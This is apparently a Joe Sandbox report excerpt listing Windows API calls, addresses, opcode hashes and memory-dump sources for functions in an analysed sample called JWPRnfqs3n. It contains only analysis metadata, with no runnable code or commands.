                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3fdbd76c5f9fc92a8aeeecdfc1fd4ca7cbce33edf3c77cfb2a573e47f1a64a40
                                                                            • Instruction ID: 0950dd940aa7409af175c3c6f85859d54f28744d209a78b1bb0c469aebb9c5a9
                                                                            • Opcode Fuzzy Hash: 3fdbd76c5f9fc92a8aeeecdfc1fd4ca7cbce33edf3c77cfb2a573e47f1a64a40
                                                                            • Instruction Fuzzy Hash: 47C16E74A0421AEFCB14CF98D884EAEBBB5FF48715B148598EC06EB251D730DD85DB90
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?), ref: 0087E0BE
                                                                            • CharLowerBuffW.USER32(?,?), ref: 0087E101
                                                                              • Part of subcall function 0087D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0087D7C5
                                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0087E301
                                                                            • _memmove.LIBCMT ref: 0087E314
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                                                            • String ID:
                                                                            • API String ID: 3659485706-0
                                                                            • Opcode ID: 368db3334bd1eb118cfb1d636ecc1ae59002b3b7ed8af16f2b498243320123d6
                                                                            • Instruction ID: bf3b04339e06f49780b1deb4cfaf85c66851132e48a0f127b0bdec2e15cc9571
                                                                            • Opcode Fuzzy Hash: 368db3334bd1eb118cfb1d636ecc1ae59002b3b7ed8af16f2b498243320123d6
                                                                            • Instruction Fuzzy Hash: 84C14671A083019FC754DF28C88096ABBE4FF89718F14896EF999DB352D730E945CB92
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 008780C3
                                                                            • CoUninitialize.OLE32 ref: 008780CE
                                                                              • Part of subcall function 0085D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0085D5D4
                                                                            • VariantInit.OLEAUT32(?), ref: 008780D9
                                                                            • VariantClear.OLEAUT32(?), ref: 008783AA
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                            • String ID:
                                                                            • API String ID: 780911581-0
                                                                            • Opcode ID: a9ba408072f14f785cd8c5305528dbbe22f9e1c7c47c87984ba4aca9eba2e354
                                                                            • Instruction ID: 35b8aaff4f89ee90e1e313422a419a5f3f0d5efcbbe7a14cd76035aa8761ea8c
                                                                            • Opcode Fuzzy Hash: a9ba408072f14f785cd8c5305528dbbe22f9e1c7c47c87984ba4aca9eba2e354
                                                                            • Instruction Fuzzy Hash: 42A112756047019FCB40DF28C885A2AB7E4FF89764F148458F99ADB3A2CB30ED45CB92
                                                                            APIs
                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00892C7C,?), ref: 008576EA
                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00892C7C,?), ref: 00857702
                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,0088FB80,000000FF,?,00000000,00000800,00000000,?,00892C7C,?), ref: 00857727
                                                                            • _memcmp.LIBCMT ref: 00857748
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                            • String ID:
                                                                            • API String ID: 314563124-0
                                                                            • Opcode ID: 83e7594e3256fcf0eb2dcb1fba3ee292fdd58e610264d756775b1fcdea9870a4
                                                                            • Instruction ID: 67efe29e4a0c0a5b70115dc9bb5d24e4d57cab29b64df67633581ed82be01bd8
                                                                            • Opcode Fuzzy Hash: 83e7594e3256fcf0eb2dcb1fba3ee292fdd58e610264d756775b1fcdea9870a4
                                                                            • Instruction Fuzzy Hash: BC810E75A00109EFCB04DFA8D984DEEB7B9FF89315F208558E505EB250DB71AE0ACB60
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$AllocClearCopyInitString
                                                                            • String ID:
                                                                            • API String ID: 2808897238-0
                                                                            • Opcode ID: b02fd29df5ba3921c19c3a7c6eefabdca47fb2634918a40394470709eac7242e
                                                                            • Instruction ID: ed310cd6cf36d9749df4e1817d5ab54e29dac1bf4c8ea229b945625c0cb0e81b
                                                                            • Opcode Fuzzy Hash: b02fd29df5ba3921c19c3a7c6eefabdca47fb2634918a40394470709eac7242e
                                                                            • Instruction Fuzzy Hash: C051E7747003059ADF21AF69D89163AB7E5FF44315F60C81FE986DB292FA30D8588702
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00859AD2
                                                                            • __itow.LIBCMT ref: 00859B03
                                                                              • Part of subcall function 00859D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00859DBE
                                                                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00859B6C
                                                                            • __itow.LIBCMT ref: 00859BC3
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$__itow
                                                                            • String ID:
                                                                            • API String ID: 3379773720-0
                                                                            • Opcode ID: e3d02387f3ef33bd51224673dd43bbc7b34b0f0435d6043bf98fc3cbe11252de
                                                                            • Instruction ID: 235594aace9a57f74a94394187a179984a8379b1505e50dae520ec767bf47d26
                                                                            • Opcode Fuzzy Hash: e3d02387f3ef33bd51224673dd43bbc7b34b0f0435d6043bf98fc3cbe11252de
                                                                            • Instruction Fuzzy Hash: B8414F74A00218ABEF11EF58DC45BEE7BB9FF44725F000059FD45E6291DB74A948CB62
                                                                            APIs
                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 008769D1
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 008769E1
                                                                              • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                                              • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00876A45
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00876A51
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$__itow__swprintfsocket
                                                                            • String ID:
                                                                            • API String ID: 2214342067-0
                                                                            • Opcode ID: a769062cf01b9af0ae77d2333af6874499a729a704cb6d9e9f8b74d4fb0630df
                                                                            • Instruction ID: 7be90bbab678523e3bbc11872ebf374e354e819a084e57d541d563ff6aad718e
                                                                            • Opcode Fuzzy Hash: a769062cf01b9af0ae77d2333af6874499a729a704cb6d9e9f8b74d4fb0630df
                                                                            • Instruction Fuzzy Hash: 8D418175740610AFEB90AF28CC86F2A77A4FB04B14F04C168FA99EB2C3DA709D008752
                                                                            APIs
                                                                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0088F910), ref: 008764A7
                                                                            • _strlen.LIBCMT ref: 008764D9
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen
                                                                            • String ID:
                                                                            • API String ID: 4218353326-0
                                                                            • Opcode ID: e525c39d3ccbf010bb2bf960832fb7c894ca0d90eea91a1893873f04cb8bbfff
                                                                            • Instruction ID: 0f02b209bdca7fe0f9934e5869f9e34562f6d93f2579f066f596ff95d75412c5
                                                                            • Opcode Fuzzy Hash: e525c39d3ccbf010bb2bf960832fb7c894ca0d90eea91a1893873f04cb8bbfff
                                                                            • Instruction Fuzzy Hash: A4418E31600518ABCB14EBA8EC96EAEB7A9FF04310F108165F919D7297EB30ED54CB52
                                                                            APIs
                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0086B89E
                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0086B8C4
                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0086B8E9
                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0086B915
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 3321077145-0
                                                                            • Opcode ID: e6c6a75089b37cc8bbe6923e99ee592b7d66ccb38b350096bc13e145509cbe47
                                                                            • Instruction ID: 37a2a948d87f0e30625dcd038e33fc7b27802e09ea8168b6502395d2c7125412
                                                                            • Opcode Fuzzy Hash: e6c6a75089b37cc8bbe6923e99ee592b7d66ccb38b350096bc13e145509cbe47
                                                                            • Instruction Fuzzy Hash: F841E875600511DFCB51DF19C445A59BBA1FF49314F15C098ED8AEB3A2CB30ED41CB92
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00860B27
                                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00860B43
                                                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00860BA9
                                                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00860BFB
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            • Opcode ID: cb28cde595bbed39ce6bdfae03d488c8e3d6af0338974d186b5a531a1b207f41
                                                                            • Instruction ID: eca9f9db6163f7d45ac8b82c6cdaeadaaf2eadccdcde3f319a616722e8168b3d
                                                                            • Opcode Fuzzy Hash: cb28cde595bbed39ce6bdfae03d488c8e3d6af0338974d186b5a531a1b207f41
                                                                            • Instruction Fuzzy Hash: 3C313730940218AEFB308B698C05BFBBBA6FB45339F18835AE581D21D2C7758D449B5A
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00860C66
                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00860C82
                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 00860CE1
                                                                            • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00860D33
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            • Opcode ID: 4c314b8977809cb9ed292a3a3543e1cf29b6fd32e79c575b8c8fd29c61f490f8
                                                                            • Instruction ID: 63e21bcf501d16b3341e77874b2ca88c06d962f006a73cd292a0267e67901fbb
                                                                            • Opcode Fuzzy Hash: 4c314b8977809cb9ed292a3a3543e1cf29b6fd32e79c575b8c8fd29c61f490f8
                                                                            • Instruction Fuzzy Hash: 0131353094021C6EFF348B688804BBFBB66FB45310F15431AE581D21D2C7359D45CB5A
                                                                            APIs
                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008361FB
                                                                            • __isleadbyte_l.LIBCMT ref: 00836229
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00836257
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0083628D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                            • String ID:
                                                                            • API String ID: 3058430110-0
                                                                            • Opcode ID: 269f377e79595205de0e5b7bf50ffd08c51111c838a25eccb2a1dc85b320a3b0
                                                                            • Instruction ID: fa9b39869ea4a1804b0a33569817e8c295c5708dcb785262cbbe21f131c1b247
                                                                            • Opcode Fuzzy Hash: 269f377e79595205de0e5b7bf50ffd08c51111c838a25eccb2a1dc85b320a3b0
                                                                            • Instruction Fuzzy Hash: 7531A031604256BFDF218F69CC48BAB7BB9FF82310F168129E864D7191EB31D960D790
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 00884F02
                                                                              • Part of subcall function 00863641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0086365B
                                                                              • Part of subcall function 00863641: GetCurrentThreadId.KERNEL32 ref: 00863662
                                                                              • Part of subcall function 00863641: AttachThreadInput.USER32(00000000,?,00865005), ref: 00863669
                                                                            • GetCaretPos.USER32(?), ref: 00884F13
                                                                            • ClientToScreen.USER32(00000000,?), ref: 00884F4E
                                                                            • GetForegroundWindow.USER32 ref: 00884F54
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                            • String ID:
                                                                            • API String ID: 2759813231-0
                                                                            • Opcode ID: 8da7887ceff9f778ed91c31e7231cfbd9b0e9f153eb27cb3539dfbcf9cc0d789
                                                                            • Instruction ID: 9a63ea80b78e3b997452ba6cc8fbeb2299f70df88cb65cc4db944e6108e7ca3f
                                                                            • Opcode Fuzzy Hash: 8da7887ceff9f778ed91c31e7231cfbd9b0e9f153eb27cb3539dfbcf9cc0d789
                                                                            • Instruction Fuzzy Hash: 84310F71D00108AFDB40EFA9CC859EFB7F9FF95304F10406AE555E7242DA719E458BA1
                                                                            APIs
                                                                              • Part of subcall function 0085810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00858121
                                                                              • Part of subcall function 0085810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0085812B
                                                                              • Part of subcall function 0085810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0085813A
                                                                              • Part of subcall function 0085810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00858141
                                                                              • Part of subcall function 0085810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00858157
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008586A3
                                                                            • _memcmp.LIBCMT ref: 008586C6
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008586FC
                                                                            • HeapFree.KERNEL32(00000000), ref: 00858703
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                            • String ID:
                                                                            • API String ID: 1592001646-0
                                                                            • Opcode ID: 87a692b93412ea4e992cf9cce4bfc3bad55eab7254cf18932366cd98c6ef37d5
                                                                            • Instruction ID: c5efa954c130ec3da3be79a38c571d2e6b36be4e6cbb7d16a5dff323cddba2d3
                                                                            • Opcode Fuzzy Hash: 87a692b93412ea4e992cf9cce4bfc3bad55eab7254cf18932366cd98c6ef37d5
                                                                            • Instruction Fuzzy Hash: BA214671A41109EBDB10DFA8C989BAEB7F8FB54306F15405AE844AB241DB30AA09CB90
                                                                            APIs
                                                                            • __setmode.LIBCMT ref: 008209AE
                                                                              • Part of subcall function 00805A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00867896,?,?,00000000), ref: 00805A2C
                                                                              • Part of subcall function 00805A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00867896,?,?,00000000,?,?), ref: 00805A50
                                                                            • _fprintf.LIBCMT ref: 008209E5
                                                                            • OutputDebugStringW.KERNEL32(?), ref: 00855DBB
                                                                              • Part of subcall function 00824AAA: _flsall.LIBCMT ref: 00824AC3
                                                                            • __setmode.LIBCMT ref: 00820A1A
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                            • String ID:
                                                                            • API String ID: 521402451-0
                                                                            • Opcode ID: 04c08a5a37ad22af2a6974c3a0f57a559a6aedac1556d88a528e3a7dd8db1a07
                                                                            • Instruction ID: 3b3b43ef75a95017bbeff3d1feeec9871b1b20fd2651b91c3c9090c8cd8eea8f
                                                                            • Opcode Fuzzy Hash: 04c08a5a37ad22af2a6974c3a0f57a559a6aedac1556d88a528e3a7dd8db1a07
                                                                            • Instruction Fuzzy Hash: 36112B726041246FDB04B6BCBC479BE77A8FF45310F644125F106D61C3EE6058C54BB2
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008717A3
                                                                              • Part of subcall function 0087182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0087184C
                                                                              • Part of subcall function 0087182D: InternetCloseHandle.WININET(00000000), ref: 008718E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$CloseConnectHandleOpen
                                                                            • String ID:
                                                                            • API String ID: 1463438336-0
                                                                            • Opcode ID: d4f91a5cf545a76aa742cf90d649520fb6c9403541e80060cf488bbfe51be6b6
                                                                            • Instruction ID: 5e148e17df2635453f15e02281074165bff86d92f8cbab45fd431f8694a45616
                                                                            • Opcode Fuzzy Hash: d4f91a5cf545a76aa742cf90d649520fb6c9403541e80060cf488bbfe51be6b6
                                                                            • Instruction Fuzzy Hash: 6721F631200605BFEF169F68CC45FBABBA9FF48711F10802EFA19D6955D771D810A7A1
                                                                            APIs
                                                                            • GetFileAttributesW.KERNEL32(?,0088FAC0), ref: 00863A64
                                                                            • GetLastError.KERNEL32 ref: 00863A73
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00863A82
                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0088FAC0), ref: 00863ADF
                                                                            Memory Dump Source
